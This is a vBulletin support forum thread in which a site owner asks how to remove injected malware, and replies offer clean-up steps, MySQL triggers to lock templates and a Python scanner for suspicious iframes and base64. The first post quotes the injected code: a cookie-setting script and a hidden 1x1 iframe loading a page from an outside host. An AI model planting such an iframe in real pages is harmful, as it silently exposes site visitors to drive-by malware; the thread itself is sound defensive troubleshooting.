  • Injected malware code

    My site got hacked last night or early this morning, and I'm having a heck of a time figuring out how to address the issue.

    I got warnings emailed to me from Google, and if you navigate to groundtradesxchange-dot-com, you'll likely get a big warning page before you'll need to agree to bypass to see any pages.

    But the injected code seems really tricky. I've actually only been able to spot it once via view source, and it seems once I see it on a page, I refresh that page and it's gone.

    Anyway - the injected code I found appeared before the html doctype declaration, and was the following:

    Code:
    <script>
    // Sets a marker cookie that expires roughly 4.3 days (372800000 ms) later.
    function SetCookie(cookieName, cookieContent) {
      var cookiePath = '/';
      var expDate = new Date();
      expDate.setTime(expDate.getTime() + 372800000);
      var expires = expDate.toGMTString();
      document.cookie = cookieName + "=" + escape(cookieContent) + ";path=" + escape(cookiePath) + ";expires=" + expires;
    }
    SetCookie("pillaala", "ldladad");
    </script>
    <!-- Hidden 1x1 iframe that loads a page from a third-party host. -->
    <iframe name="4" width="1" height="1" scrolling="no" frameborder="no" marginwidth="0" marginheight="0" src="http://www.fratocseo.co.cc/greb.php"></iframe>
    What I don't understand is, where do I need to be looking to find where this script is residing? I've searched within the templates, languages and phrases to find even a piece of this code, and have come up empty, which makes me wonder if it's a server thing and not a vbulletin thing. And if that's the case, what should be my next step?

    I run other forums on the same server, and they appear unaffected. Possibly related, the unaffected forums are running v 3.8.1, and the affected forum is running v 3.6.8 pl2. (I know, I know. Upgrade. I will, once this is cleared up.)

    Any ideas where I should be looking?

    This injected code seems to come and go randomly, so I'm having a hard time pinning it down. The url where I was able to find it is here: http://www.groundtradesxchange.com/f...html#post70329 but like I said, it only appeared once. But it shows up enough that Google has posted a warning in their search results and most current browsers post a warning before letting you go through to the page.


  • #2
    Sometimes it is in base64, so you can search for that in your code.

    Please don't PM or VM me for support - I only help out in the threads.
    vBulletin Manual & vBulletin 4.0 Code Documentation (API)
    Want help modifying your vbulletin forum? Head on over to vbulletin.org
    If I post CSS and you don't know where it goes, throw it into the additional.css template.

    W3Schools <- awesome site for html/css help



    • #3
      ---------------------------------------------
      Here is a possible fix for this Malware
      ---------------------------------------------

      This malware shows up intermittently. First, we need the ability to reproduce this malware error in the browser at will. This will help us test whether we have successfully cleaned the malware.

      Use Google Chrome browser for the testing purpose. Simply clear all cache and browsing data in the Google Chrome browser. Then open the Chrome browser, access any thread in the forum to see that the request is redirected to the Malware warning page. Look at the page source of the Malware warning page to detect the code injection, search for the code in the vBulletin templates, delete the code injection in the appropriate template and lock down vBulletin templates to prevent any future change.

      Here are the steps to clear the cache and get the malware warning page:
      a.) Delete all cache and browsing data
      http://www.google.com/support/chrome...n&answer=95582
      b.) Close all sessions of the Google Chrome browser.
      c.) Open a new Google Chrome browser window.
      d.) After clearing the cache and browsing data, one will get the Malware warning page on almost every page in the forum.

      The next step involves finding the specific Malware code injection in the vBulletin template.
      a.) With the Malware warning in the Google Chrome browser, press CTRL+U to 'View Source'.
      b.) In the page source, search for 'fratocseo'.
      c.) This malware has injected an IFRAME into one of the templates. IFRAME code is usually injected in a heavily used template such as $footer, $header etc. I checked your site groundtradesxchange-dot-com and in your case the Malware is injected in the SHOWTHREAD vBulletin template. So now we know where the problem is.
      d.) Log on to the vBulletin AdminCP.
      e.) Go to 'Styles & Templates' > 'Search in Templates'.
      f.) In 'Search for Text' enter 'showthread' and select the 'Yes' radio button for 'Search Titles Only' > click on 'Find' > click on 'SHOWTHREAD'.
      g.) In your case, in line 1 of 'SHOWTHREAD' template, look for something which may look like "$fiiiika".
      h.) Delete "$fiiiika" from the 'SHOWTHREAD' template and click on 'Save and Reload'. This should clean the existing code in the template.
      i.) Again clear all cache and browsing data in Google Chrome browser (steps mentioned above).
      j.) Open a fresh Google Chrome browser session to go to the affected forum page again. This time the malware error will not show up, indicating that the malware has been removed successfully.


      But this fix will not prevent future injection of similar code in vBulletin templates. I could not find a way to freeze all changes to vBulletin Styles and Templates. Maybe someone in vBulletin Team could weigh in to suggest a way to freeze all changes to the Styles and Templates. In the meantime, here is a crude way to temporarily lock down vBulletin templates preventing any change to the templates. vBulletin templates are stored in the database table vb_template. Adding the following two triggers to the database will prevent all updates and inserts into the vb_template table. Also, just to be sure, keep a backup of table vb_template, which will be handy in case similar Malware injects any code in any template. Here is the simple code for the two database triggers.

      -- MySQL does not let a trigger modify the table it fires on (error 1442),
      -- so the UPDATE below aborts the triggering statement and the row stays unchanged.
      -- On MySQL 5.5+ a SIGNAL SQLSTATE '45000' in the trigger body is the explicit way to refuse the change.
      delimiter //
      CREATE TRIGGER vb_template_u
      BEFORE UPDATE ON vb_template
      FOR EACH ROW
      BEGIN
        UPDATE vb_template
        SET styleid = OLD.styleid,
            title = OLD.title,
            template = OLD.template,
            template_un = OLD.template_un,
            templatetype = OLD.templatetype,
            dateline = OLD.dateline,
            username = OLD.username,
            version = OLD.version,
            product = OLD.product
        WHERE templateid = OLD.templateid;
      END//
      delimiter ;

      -- Same mechanism for INSERTs: the DELETE on the same table raises error 1442
      -- and the new row is never written.
      delimiter //
      CREATE TRIGGER vb_template_i
      BEFORE INSERT ON vb_template
      FOR EACH ROW
      BEGIN
        DELETE FROM vb_template
        WHERE templateid = NEW.templateid;
      END//
      delimiter ;

      These two triggers will prevent any updates to the templates, preventing future Malware injection into your website. If you would like to edit any vBulletin template, simply drop these triggers before editing the template, and to prevent future injection of IFRAME code simply recreate these triggers after you are done editing templates.

      Hope this is useful.

      kapoor22
      Last edited by kapoor22; Sat 7th Aug '10, 4:09am.
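A defender-side check that pulls together the advice in posts #2 and #3, added here as an example for this thread (not vBulletin's code or any poster's): it scans template text or a captured page for content sitting before the doctype (such as the stray $fiiiika), a hidden 1x1 iframe pointing at a host outside your own, a long base64 run, and any difference from a backup copy of the template table. The own_hosts set, the third-party.invalid host and all sample inputs are constructed.

```python
import base64
import re

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
SRC_RE = re.compile(r"""\bsrc=["']?https?://([^/"'\s>]+)""", re.I)
TINY_RE = re.compile(r"""\b(?:width|height)=["']?[01]\b""", re.I)
DOCTYPE_RE = re.compile(r"\$stylevar\[htmldoctype\]|<!DOCTYPE", re.I)  # template or page start
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")  # long unbroken base64-like run

def looks_like_base64(blob):
    """True if the run decodes cleanly as base64 after padding to a multiple of 4."""
    try:
        base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
        return True
    except ValueError:
        return False

def scan_template(title, body, own_hosts, backup=None):
    """Return (title, reason) findings for one template body or captured page."""
    findings = []
    m = DOCTYPE_RE.search(body)
    prefix = body[: m.start()].strip() if m else ""
    if prefix:  # anything before the doctype, e.g. a stray $variable or a <script>
        findings.append((title, "content before doctype: %r" % prefix[:60]))
    for tag in IFRAME_RE.findall(body):
        src = SRC_RE.search(tag)
        if src and src.group(1).lower() not in own_hosts:
            hidden = " (1x1, hidden)" if TINY_RE.search(tag) else ""
            findings.append((title, "iframe to third-party host %s%s" % (src.group(1), hidden)))
    for blob in B64_RE.findall(body):
        if looks_like_base64(blob):
            findings.append((title, "base64 blob (%d chars)" % len(blob)))
    if backup is not None and body != backup:  # compare with the saved vb_template copy
        findings.append((title, "differs from backup copy"))
    return findings

def demo():
    """Run the scanner over constructed inputs modelled on this thread."""
    own = {"www.example-forum.invalid"}  # constructed: hosts you legitimately serve
    # Constructed template row: a stray variable sits before the doctype, as in post #3.
    template = "$fiiiika$stylevar[htmldoctype]\n<html>...</html>"
    backup = "$stylevar[htmldoctype]\n<html>...</html>"
    # Constructed rendered page: a hidden iframe to a third-party host, as in post #1.
    page = ('<iframe width="1" height="1" src="http://third-party.invalid/x.php"></iframe>'
            "<!DOCTYPE html><html></html>")
    # Constructed encoded blob (harmless text), the base64 case from post #2.
    blob = base64.b64encode(b"constructed sample, not a real payload").decode()
    return (scan_template("SHOWTHREAD", template, own, backup)
            + scan_template("rendered page", page, own)
            + scan_template("plugin", "eval(base64_decode('%s'));" % blob, own))
```

Run it against a dump of the template table (and a few captured pages) after the clean-up from post #3; an empty result on every template is the check that the backup and the live rows still agree.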



      • #4
        What do you do if it's not in a template but in the database?



        • #5
          Then you remove it. Templates are in the database. If you see it in a template in the database, but not in the style manager, then you can save the template in the style manager and it should overwrite the stuff in the database.



          • #6
            malware problem

            I am having an issue right now with my vbulletin at: http://www.ffdpokerforum.com/ on every browser I try to load gives me a malware warning at my forums, I can't seem to figure it out either and all advertising is done in-house. I have deleted several spam links at my site, and it appears that I have gotten rid of any spam bots from registering and getting around the captcha codes, but the malware issue is still there and I really need some help. If anyone thinks they can help me get rid of the problem I would greatly appreciate it. Should I get rid of my custom templates? What can be done for testing and what should be looked for in the code to remove any harmful scripts?
            Play Online Texas Holdem Poker? Checkout my Texas Holdem Poker Forums and get Online Poker Bonuses
